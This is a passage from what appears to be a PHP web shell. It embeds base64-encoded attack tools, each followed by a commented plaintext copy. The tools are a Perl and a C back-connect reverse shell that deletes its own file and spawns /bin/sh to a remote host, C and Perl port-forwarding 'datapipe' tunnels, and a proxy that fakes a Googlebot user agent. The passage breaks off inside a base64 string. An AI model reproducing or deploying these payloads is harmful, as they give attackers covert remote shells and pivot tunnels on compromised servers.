connect(SOCKET, $paddr) || die("Error: $!\n");
3245
3246
open(STDIN, ">&SOCKET");
3247
3248
open(STDOUT, ">&SOCKET");
3249
3250
open(STDERR, ">&SOCKET");
3251
3252
system($system);
3253
3254
close(STDIN);
3255
3256
close(STDOUT);
3257
3258
close(STDERR);
3259
3260
3261
3262
*/
3263
3264
3265
3266
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
3267
3268
BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
3269
3270
SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
3271
3272
KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
3273
3274
sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
3275
3276
Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
3277
3278
QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
3279
3280
Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
3281
3282
3283
3284
3285
3286
/* ?ST SATIRIN KIRILMI? HAL? */
3287
3288
/*
3289
3290
3291
3292
#include <stdio.h>
3293
3294
#include <sys/socket.h>
3295
3296
#include <netinet/in.h>
3297
3298
int main(int argc, char *argv[])
3299
3300
{
3301
3302
 int fd;
3303
3304
 struct sockaddr_in sin;
3305
3306
 char rms[21]="rm -f "; 
3307
3308
 daemon(1,0);
3309
3310
 sin.sin_family = AF_INET;
3311
3312
 sin.sin_port = htons(atoi(argv[2]));
3313
3314
 sin.sin_addr.s_addr = inet_addr(argv[1]); 
3315
3316
 bzero(argv[1],strlen(argv[1])+1+strlen(argv[2])); 
3317
3318
 fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) ; 
3319
3320
 if ((connect(fd, (struct sockaddr *) &sin, sizeof(struct sockaddr)))<0) {
3321
3322
   perror("[-] connect()");
3323
3324
   exit(0);
3325
3326
 }
3327
3328
 strcat(rms, argv[0]);
3329
3330
 system(rms);  
3331
3332
 dup2(fd, 0);
3333
3334
 dup2(fd, 1);
3335
3336
 dup2(fd, 2);
3337
3338
 execl("/bin/sh","sh -i", NULL);
3339
3340
 close(fd); 
3341
3342
}
3343
3344
3345
3346
*/
3347
3348
3349
3350
3351
3352
$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
3353
3354
x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
3355
3356
HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
3357
3358
aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
3359
3360
lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
3361
3362
xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
3363
3364
W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
3365
3366
LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
3367
3368
udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
3369
3370
0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
3371
3372
iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
3373
3374
KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
3375
3376
gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
3377
3378
hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
3379
3380
iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
3381
3382
ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
3383
3384
vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
3385
3386
AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
3387
3388
QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
3389
3390
ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
3391
3392
gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
3393
3394
wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
3395
3396
29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
3397
3398
MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
3399
3400
gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
3401
3402
5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
3403
3404
HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
3405
3406
dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
3407
3408
KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
3409
3410
ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
3411
3412
E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
3413
3414
Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
3415
3416
NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
3417
3418
J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
3419
3420
CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
3421
3422
dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
3423
3424
gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
3425
3426
lsZSk7DQogIHJldHVybiAwOw0KfQ==";
3427
3428
3429
3430
/* ?ST SATIRIN KIRILMI? HAL? */
3431
3432
/*
3433
3434
3435
3436
#include <sys/types.h>
3437
3438
#include <sys/socket.h>
3439
3440
#include <sys/wait.h>
3441
3442
#include <netinet/in.h>
3443
3444
#include <stdio.h>
3445
3446
#include <stdlib.h>
3447
3448
#include <errno.h>
3449
3450
#include <unistd.h>
3451
3452
#include <netdb.h>
3453
3454
#include <linux/time.h>
3455
3456
#ifdef STRERROR
3457
3458
extern char *sys_errlist[];
3459
3460
extern int sys_nerr;
3461
3462
char *undef = "Undefined error";
3463
3464
char *strerror(error)  
3465
3466
int error;  
3467
3468
{ 
3469
3470
if (error > sys_nerr)
3471
3472
return undef;
3473
3474
return sys_errlist[error];
3475
3476
}
3477
3478
#endif
3479
3480
3481
3482
main(argc, argv)  
3483
3484
  int argc;  
3485
3486
  char **argv;  
3487
3488
{ 
3489
3490
  int lsock, csock, osock;
3491
3492
  FILE *cfile;
3493
3494
  char buf[4096];
3495
3496
  struct sockaddr_in laddr, caddr, oaddr;
3497
3498
  int caddrlen = sizeof(caddr);
3499
3500
  fd_set fdsr, fdse;
3501
3502
  struct hostent *h;
3503
3504
  struct servent *s;
3505
3506
  int nbyt;
3507
3508
  unsigned long a;
3509
3510
  unsigned short oport;
3511
3512
3513
3514
  if (argc != 4) {
3515
3516
    fprintf(stderr,"Usage: %s localport remoteport remotehost\n",argv[0]);
3517
3518
    return 30;
3519
3520
  }
3521
3522
  a = inet_addr(argv[3]);
3523
3524
  if (!(h = gethostbyname(argv[3])) &&
3525
3526
      !(h = gethostbyaddr(&a, 4, AF_INET))) {
3527
3528
    perror(argv[3]);
3529
3530
    return 25;
3531
3532
  }
3533
3534
  oport = atol(argv[2]);
3535
3536
  laddr.sin_port = htons((unsigned short)(atol(argv[1])));
3537
3538
  if ((lsock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
3539
3540
    perror("socket");
3541
3542
    return 20;
3543
3544
  }
3545
3546
  laddr.sin_family = htons(AF_INET);
3547
3548
  laddr.sin_addr.s_addr = htonl(0);
3549
3550
  if (bind(lsock, &laddr, sizeof(laddr))) {
3551
3552
    perror("bind");
3553
3554
    return 20;
3555
3556
  }
3557
3558
  if (listen(lsock, 1)) {
3559
3560
    perror("listen");
3561
3562
    return 20;
3563
3564
  }
3565
3566
  if ((nbyt = fork()) == -1) {
3567
3568
    perror("fork");
3569
3570
    return 20;
3571
3572
  }
3573
3574
  if (nbyt > 0)
3575
3576
    return 0;
3577
3578
  setsid();
3579
3580
  while ((csock = accept(lsock, &caddr, &caddrlen)) != -1) {
3581
3582
    cfile = fdopen(csock,"r+");
3583
3584
    if ((nbyt = fork()) == -1) {
3585
3586
      fprintf(cfile, "500 fork: %s\n", strerror(errno));
3587
3588
      shutdown(csock,2);
3589
3590
      fclose(cfile);
3591
3592
      continue;
3593
3594
    }
3595
3596
    if (nbyt == 0)
3597
3598
      goto gotsock;
3599
3600
    fclose(cfile);
3601
3602
    while (waitpid(-1, NULL, WNOHANG) > 0);
3603
3604
  }
3605
3606
  return 20;
3607
3608
3609
3610
 gotsock:
3611
3612
  if ((osock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
3613
3614
    fprintf(cfile, "500 socket: %s\n", strerror(errno));
3615
3616
    goto quit1;
3617
3618
  }
3619
3620
  oaddr.sin_family = h->h_addrtype;
3621
3622
  oaddr.sin_port = htons(oport);
3623
3624
  memcpy(&oaddr.sin_addr, h->h_addr, h->h_length);
3625
3626
  if (connect(osock, &oaddr, sizeof(oaddr))) {
3627
3628
    fprintf(cfile, "500 connect: %s\n", strerror(errno));
3629
3630
    goto quit1;
3631
3632
  }
3633
3634
  while (1) {
3635
3636
    FD_ZERO(&fdsr);
3637
3638
    FD_ZERO(&fdse);
3639
3640
    FD_SET(csock,&fdsr);
3641
3642
    FD_SET(csock,&fdse);
3643
3644
    FD_SET(osock,&fdsr);
3645
3646
    FD_SET(osock,&fdse);
3647
3648
    if (select(20, &fdsr, NULL, &fdse, NULL) == -1) {
3649
3650
      fprintf(cfile, "500 select: %s\n", strerror(errno));
3651
3652
      goto quit2;
3653
3654
    }
3655
3656
    if (FD_ISSET(csock,&fdsr) || FD_ISSET(csock,&fdse)) {
3657
3658
      if ((nbyt = read(csock,buf,4096)) <= 0)
3659
3660
	goto quit2;
3661
3662
      if ((write(osock,buf,nbyt)) <= 0)
3663
3664
	goto quit2;
3665
3666
    } else if (FD_ISSET(osock,&fdsr) || FD_ISSET(osock,&fdse)) {
3667
3668
      if ((nbyt = read(osock,buf,4096)) <= 0)
3669
3670
	goto quit2;
3671
3672
      if ((write(csock,buf,nbyt)) <= 0)
3673
3674
	goto quit2;
3675
3676
    }
3677
3678
  }
3679
3680
3681
3682
 quit2:
3683
3684
  shutdown(osock,2);
3685
3686
  close(osock);
3687
3688
 quit1:
3689
3690
  fflush(cfile);
3691
3692
  shutdown(csock,2);
3693
3694
 quit0:
3695
3696
  fclose(cfile);
3697
3698
  return 0;
3699
3700
}
3701
3702
3703
3704
*/
3705
3706
3707
3708
$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
3709
3710
CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
3711
3712
bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
3713
3714
gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
3715
3716
NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
3717
3718
iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
3719
3720
aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
3721
3722
SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
3723
3724
xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
3725
3726
WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
3727
3728
CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
3729
3730
yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
3731
3732
I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
3733
3734
m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
3735
3736
IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
3737
3738
lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
3739
3740
QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
3741
3742
CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
3743
3744
c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
3745
3746
NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
3747
3748
UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
3749
3750
DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
3751
3752
ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
3753
3754
1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
3755
3756
3757
3758
/* ?ST SATIRIN KIRILMI? HAL? */
3759
3760
/*
3761
3762
3763
3764
#!/usr/bin/perl
3765
3766
use IO::Socket;
3767
3768
use POSIX;
3769
3770
$localport = $ARGV[0];
3771
3772
$host      = $ARGV[1];
3773
3774
$port      = $ARGV[2];
3775
3776
$daemon=1;
3777
3778
$DIR = undef;
3779
3780
$| = 1;
3781
3782
if ($daemon){ $pid = fork; exit if $pid; die "$!" unless defined($pid); POSIX::setsid() or die "$!"; }
3783
3784
%o = ('port' => $localport,'toport' => $port,'tohost' => $host);
3785
3786
$ah = IO::Socket::INET->new('LocalPort' => $localport,'Reuse' => 1,'Listen' => 10) || die "$!";
3787
3788
$SIG{'CHLD'} = 'IGNORE';
3789
3790
$num = 0;
3791
3792
while (1) { 
3793
3794
$ch = $ah->accept(); if (!$ch) { print STDERR "$!\n"; next; }
3795
3796
++$num;
3797
3798
$pid = fork();
3799
3800
if (!defined($pid)) { print STDERR "$!\n"; } 
3801
3802
elsif ($pid == 0) { $ah->close(); Run(\%o, $ch, $num); } 
3803
3804
else { $ch->close(); }
3805
3806
}
3807
3808
sub Run {
3809
3810
my($o, $ch, $num) = @_;
3811
3812
my $th = IO::Socket::INET->new('PeerAddr' => $o->{'tohost'},'PeerPort' => $o->{'toport'});
3813
3814
if (!$th) { exit 0; }
3815
3816
my $fh;
3817
3818
if ($o->{'dir'}) { $fh = Symbol::gensym(); open($fh, ">$o->{'dir'}/tunnel$num.log") or die "$!"; }
3819
3820
$ch->autoflush();
3821
3822
$th->autoflush();
3823
3824
while ($ch || $th) {
3825
3826
my $rin = "";
3827
3828
vec($rin, fileno($ch), 1) = 1 if $ch;
3829
3830
vec($rin, fileno($th), 1) = 1 if $th;
3831
3832
my($rout, $eout);
3833
3834
select($rout = $rin, undef, $eout = $rin, 120);
3835
3836
if (!$rout  &&  !$eout) {}
3837
3838
my $cbuffer = "";
3839
3840
my $tbuffer = "";
3841
3842
if ($ch && (vec($eout, fileno($ch), 1) || vec($rout, fileno($ch), 1))) {
3843
3844
my $result = sysread($ch, $tbuffer, 1024);
3845
3846
if (!defined($result)) {
3847
3848
print STDERR "$!\n";
3849
3850
exit 0;
3851
3852
}
3853
3854
if ($result == 0) { exit 0; }
3855
3856
}
3857
3858
if ($th  &&  (vec($eout, fileno($th), 1)  || vec($rout, fileno($th), 1))) {
3859
3860
my $result = sysread($th, $cbuffer, 1024);
3861
3862
if (!defined($result)) { print STDERR "$!\n"; exit 0; }
3863
3864
if ($result == 0) {exit 0;}
3865
3866
}
3867
3868
if ($fh  &&  $tbuffer) {(print $fh $tbuffer);}
3869
3870
while (my $len = length($tbuffer)) {
3871
3872
my $res = syswrite($th, $tbuffer, $len);
3873
3874
if ($res > 0) {$tbuffer = substr($tbuffer, $res);} 
3875
3876
else {print STDERR "$!\n";}
3877
3878
}
3879
3880
while (my $len = length($cbuffer)) {
3881
3882
my $res = syswrite($ch, $cbuffer, $len);
3883
3884
if ($res > 0) {$cbuffer = substr($cbuffer, $res);} 
3885
3886
else {print STDERR "$!\n";}
3887
3888
}}}
3889
3890
3891
3892
3893
3894
*/
3895
3896
3897
3898
$prx_pl="IyF1c3IvYmluL3BlcmwKdXNlIFNvY2tldDsKbXkgJHBvcnQgPSAkQVJHVlswXXx8MzEzMzc7Cm15ICRwcm90b2NvbCA9IGdldHByb3RvYn
3899
3900
luYW1lKCd0Y3AnKTsKbXkgJG15X2FkZHIgID0gc29ja2FkZHJfaW4gKCRwb3J0LCBJTkFERFJfQU5ZKTsKc29ja2V0IChTT0NLLCBBRl9JTkVULCBTT
3901
3902
0NLX1NUUkVBTSwgJHByb3RvY29sKSBvciBkaWUgInNvY2tldCgpOiAkISI7CnNldHNvY2tvcHQgKFNPQ0ssIFNPTF9TT0NLRVQsIFNPX1JFVVNFQURE
3903
3904
UiwxICkgb3IgZGllICJzZXRzb2Nrb3B0KCk6ICQhIjsKYmluZCAoU09DSywgJG15X2FkZHIpIG9yIGRpZSAiYmluZCgpOiAkISI7Cmxpc3RlbiAoU09
3905
3906
DSywgU09NQVhDT05OKSBvciBkaWUgImxpc3RlbigpOiAkISI7CiRTSUd7J0lOVCd9ID0gc3ViIHsKY2xvc2UgKFNPQ0spOwpleGl0Owp9Owp3aGlsZS
3907
3908
AoMSkgewpuZXh0IHVubGVzcyBteSAkcmVtb3RlX2FkZHIgPSBhY2NlcHQgKFNFU1NJT04sIFNPQ0spOwpteSAoJGZpc3QsICRtZXRob2QsICRyZW1vd
3909
3910
GVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IGFuYWx5emVfcmVxdWVzdCgpOwppZihvcGVuX2Nvbm5lY3Rpb24gKFJFTU9URSwgJHJlbW90ZV9ob3N0LCAk
3911
3912
cmVtb3RlX3BvcnQpID09IDApIHsKY2xvc2UgKFNFU1NJT04pOwpuZXh0Owp9CnByaW50IFJFTU9URSAkZmlyc3Q7CnByaW50IFJFTU9URSAiVXNlci1
3913
3914
BZ2VudDogR29vZ2xlYm90LzIuMSAoK2h0dHA6Ly93d3cuZ29vZ2xlLmNvbS9ib3QuaHRtbClcbiI7CndoaWxlICg8U0VTU0lPTj4pIHsKbmV4dCBpZi
3915
3916
AoL1Byb3h5LUNvbm5lY3Rpb246LyB8fCAvVXNlci1BZ2VudDovKTsKcHJpbnQgUkVNT1RFICRfOwpsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvK
3917
3918
TsKfQpwcmludCBSRU1PVEUgIlxuIjsKJGhlYWRlciA9IDE7CndoaWxlICg8UkVNT1RFPikgewpwcmludCBTRVNTSU9OICRfOwppZiAoJGhlYWRlcikg
3919
3920
eyAgICAgCmlmICgkaGVhZGVyICYmICRfID1+IC9eW1xzXHgwMF0qJC8pIHsKJGhlYWRlciA9IDA7Cn0KfQp9CmNsb3NlIChSRU1PVEUpOwpjbG9zZSA
3921
3922
oU0VTU0lPTik7Cn0KY2xvc2UgKFNPQ0spOwpzdWIgYW5hbHl6ZV9yZXF1ZXN0IHsKbXkgKCRmaXN0LCAkdXJsLCAkcmVtb3RlX2hvc3QsICRyZW1vdG
3923
3924
VfcG9ydCwgJG1ldGhvZCk7CiRmaXJzdCA9IDxTRVNTSU9OPjsKJHVybCA9ICgkZmlyc3QgPX4gbXwoaHR0cDovL1xTKyl8KVswXTsKKCRtZXRob2QsI
3925
3926
CRyZW1vdGVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IAooJGZpcnN0ID1+IG0hKEdFVCkgaHR0cDovLyhbXi86XSspOj8oXGQqKSEgKTsKaWYgKCEkcmVt
3927
3928
b3RlX2hvc3QpIHsKY2xvc2UoU0VTU0lPTik7CmV4aXQ7Cn0KJHJlbW90ZV9wb3J0ID0gImh0dHAiIHVubGVzcyAoJHJlbW90ZV9wb3J0KTsKJGZpcnN
3929
3930
0ID1+IHMvaHR0cDpcL1wvW15cL10rLy87CnJldHVybiAoJGZpcnN0LCAkbWV0aG9kLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7Cn0Kc3ViIG
3931
3932
